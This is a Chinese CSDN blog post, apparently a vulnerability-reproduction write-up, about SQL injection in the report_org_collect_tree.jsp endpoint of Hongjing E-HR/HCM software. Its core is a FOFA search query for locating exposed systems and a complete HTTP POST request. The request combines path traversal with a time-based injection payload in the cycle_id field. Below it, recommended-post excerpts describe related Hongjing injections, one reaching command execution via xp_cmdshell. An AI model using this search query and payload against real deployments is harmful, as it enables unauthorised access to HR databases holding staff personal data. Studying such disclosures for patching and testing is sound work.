【无标题】宏景E-HR的 report_org_collect_tree接口存在sql注入

已于 2024-03-25 20:34:11 修改
阅读量308 收藏 5
点赞数 10
文章标签: 安全 web安全 数据库
于 2024-03-25 20:33:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137012899
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

宏景HCM是指宏景人力资源管理系统(Human Capital Management),它是一种集成的软件解决方案,旨在帮助组织有效地管理人力资源。HCM系统通常包括多个模块,如招聘、员工信息管理、绩效管理、培训与发展、薪酬管理和福利管理等,以帮助企业实现人力资源的全面管理。

宏景E-HR 的report_org_collect_tree接口sql注入,黑客可以利用该漏洞执行SQL语句,造成危害。

资产搜索

app="HJSOFT-HCM"

漏洞复现:

漏洞检测:

POST /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=1A6EE28CE54DF544B8BFFA87B5F752EB
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

params=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:5'--%20

漏洞利用:

cn_大腿
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宏景eHR sduty/getSdutyTree SQL注入漏洞复现
0xSec
07-04 596
宏景eHR /servlet/sduty/getSdutyTree 接口存在SQL注入漏洞,,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
【漏洞复现】宏景eHR LoadOtherTreeServlet SQL注入漏洞
siu~
07-07 392
宏景eHR LoadOtherTreeServlet接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
【漏洞复现】宏景eHR showmediainfo SQL注入漏洞
qq_67810151的博客
04-20 281
宏景eHR /workbench/duty/showmediainfo接口存在SQL注入漏洞,攻击者可以通过该漏洞构造sql语句获取数据库信息。
宏景eHR report_org_collect_tree.jsp SQL注入漏洞复现
0xSec
03-22 499
宏景eHR report_org_collect_tree.jsp 接口存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
【漏洞复现】宏景人力资源信息管理系统 showmediainfo SQL注入漏洞
https://blog.echo234.cn/
04-04 1115
宏景科技是一家在智慧城市综合服务领域具有显著影响力的企业。公司以数字赋能百业兴旺,以智慧定义城市未来,致力于让城市管理更简单,让市民工作、生活更便捷。作为行业的佼佼者,宏景科技不断跟进物联网、大数据、云计算、GIS、人工智能等新技术的最新发展及应用,积极掌握并实现核心技术的更新迭代,积累了一定的技术储备。
【漏洞复现】宏景-HCM-report_org_collect_tree-sql注入
知黑而守白
03-21 115
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。浙大恩特客户资源管理系统 report_org_collect_tree 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
0day 未公开 宏景-pos_dept_post-sql注入漏洞复现
weixin_43167326的博客
06-05 919
宏景人力资源管理系统是一款集招聘管理、员工信息管理、薪资福利管理、绩效管理等功能于一体的综合人力资源管理软件。该系统通过整合各项人力资源业务,实现了数字化、自动化管理,有效提升了企业的人力资源管理效率。系统支持灵活的指标项自定义,满足企业个性化需求,并提供了完善的统计分析工具,帮助管理者深入了解企业现状,洞察问题与趋势。此外,宏景人力资源管理系统还支持移动端应用,方便用户随时随地处理人力资源业务。
宏景eHR get_org_tree.jsp SQL注入漏洞复现
Keepb1ue的博客
01-18 820
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件.宏景eHR zp_options/get_org_tree.jsp接口存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
E-HR系统人员信息数据字典[定义].pdf
10-11
E-HR系统,即电子人力资源管理系统,是一种利用信息技术来管理和优化企业人力资源的工具。这个系统通常包含各种模块,用于管理员工的全生命周期,从招聘、入职、培训、绩效评估到离职等过程。在这个E-HR系统人员信息...
宏景hr数据字典.doc
10-07
宏景HR数据字典 宏景HR数据字典是一份详细的数据字典,用于存储HRP数据库设计方案的人员根本信息。该数据字典主要存储在2.5人员根本情况表中,涵盖了机构、部门、职位、人员等信息。 1. 总体介绍 HRP数据库设计...
宏景hr数据字典[归纳].pdf
10-13
"宏景HR数据字典" 宏景HR数据字典是HRP数据库设计方案的核心组件,负责存储人员的基本信息和机构数据。该方案主要使用HRP Access(97/2000)、SQL Server(7.0/2000)和Oracle(9i)三种数据库管理系统。 HRP...
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 973
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
如何确保场外个股期权交易的安全
最新发布
Lunasi的博客
08-07 94
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
8月5日学习笔记 glibc安装与安全用户角色权限
weixin_70751701的博客
08-05 1120
安装步骤1.安装依赖库# 添加开机启动Enter password: # 输⼊123or \g.or \g.#重启服务# 有套接字⽂件,就可以链接mysql服务or \g.owners.Type 'help;mysql>```
数据跨境传输的安全合规风险如何规避?获取免费解决方案白皮书
文件数据安全交换
08-07 275
在全球化的背景下,企业进行有 效的资源整合,学习海外市场的先进技术和管理经验,寻找新的增长点,实现业务的多元化和 可持续发展,不仅有利于开辟新市场,更有助于巩固和增强企业在全球中的地位。应用风险:跨境数据的承载介质多样、呈现形态各异、应用广泛,数据所在国的政策和法律存 在差异,这可能导致数据所有和使用者权限模糊,数据应用开发存在被滥用的风险。自然灾害(如火灾、水灾、地震等)和事故(如电力故障、设备故障等)可能导致数据的物理 损失,使数据的完整性和可用性遭到破坏,数据失去使用价值。2、数据攻击窃取风险。
宏景 get_org_tree-sqli
11-30
宏景 get_org_tree-sqli是一种SQL注入攻击。在宏景软件的get_org_tree函数中,存在着未经过滤或者验证的用户输入,导致攻击者可以通过构造恶意的SQL查询语句来对数据库进行未授权的访问和操作。 当应用程序没有正确地对用户输入进行过滤、转义或验证时,攻击者可以利用这个漏洞构造恶意的输入来执行SQL查询语句。攻击者可以注入SQL代码,修改数据库查询语句的逻辑,获取、删除或修改数据库中的数据,甚至完全控制数据库服务器。 为了防止宏景 get_org_tree-sqli攻击,开发人员应该始终遵循安全的编码实践。 1. 输入验证和过滤:应该对所有的用户输入进行验证和过滤,确保输入数据符合预期的格式和类型。可以使用合适的输入验证函数或正则表达式来实现。 2. 使用参数化查询或预处理语句:建议使用参数化查询或预处理语句来执行数据库查询操作,而不是直接拼接用户输入构成的查询语句。参数化查询可以防止SQL注入攻击。 3. 最小权限原则:数据库账户应该按照最小权限原则进行授权,避免给予不必要的权限。这样即使发生了SQL注入攻击,攻击者也只能执行有限的操作。 4. 错误信息处理:避免将详细的错误信息直接输出到用户界面上,这样可能会暴露敏感的数据库结构和错误详情,为攻击者提供攻击的线索。可以将错误信息记录在日志文件中,以便日后的安全审计和调查。 通过以上措施,开发人员可以提高应用程序的安全性,防止宏景 get_org_tree-sqli等SQL注入攻击对系统造成威胁。同时,定期对应用程序进行安全测试和漏洞扫描,及时修复和更新系统中发现的安全漏洞,保障系统安全运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值